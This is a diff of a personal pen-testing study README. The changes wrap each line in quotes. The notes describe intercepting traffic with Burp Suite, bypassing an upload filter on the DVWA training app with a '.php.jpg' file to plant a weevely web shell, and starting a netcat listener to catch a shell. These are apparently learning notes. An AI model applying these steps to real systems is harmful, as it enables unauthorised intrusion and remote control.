i-am-hacker-now/web-pen-test/README.txt

 Intercepting Requests
 --------------------

-Used tool - Burp Suite
+"Used tool - Burp Suite"

-It is GUI tool.
+"It is GUI tool."

-Setup using Burp Suite as proxy in Firefox.
+"Setup using Burp Suite as proxy in Firefox."

-Bypass file uploading by uploading file extension as [file_name].php.jpg
+"Bypass file uploading by uploading file extension as [file_name].php.jpg"

-So, it will execute as this - weevely [target_address]/dvwa/hackable/uploads/[file_name].php.jpg [password]
+"So, it will execute as this => weevely [target_address]/dvwa/hackable/uploads/[file_name].php.jpg [password]"

 Code Execution Vulnerability
 ---------------------------

-Used tool - Net Cat
+"Used tool - Net Cat"

-Type the following in Hacker' machine
+"Type the following in Hacker' machine"

 > nc -vv -l -p 8080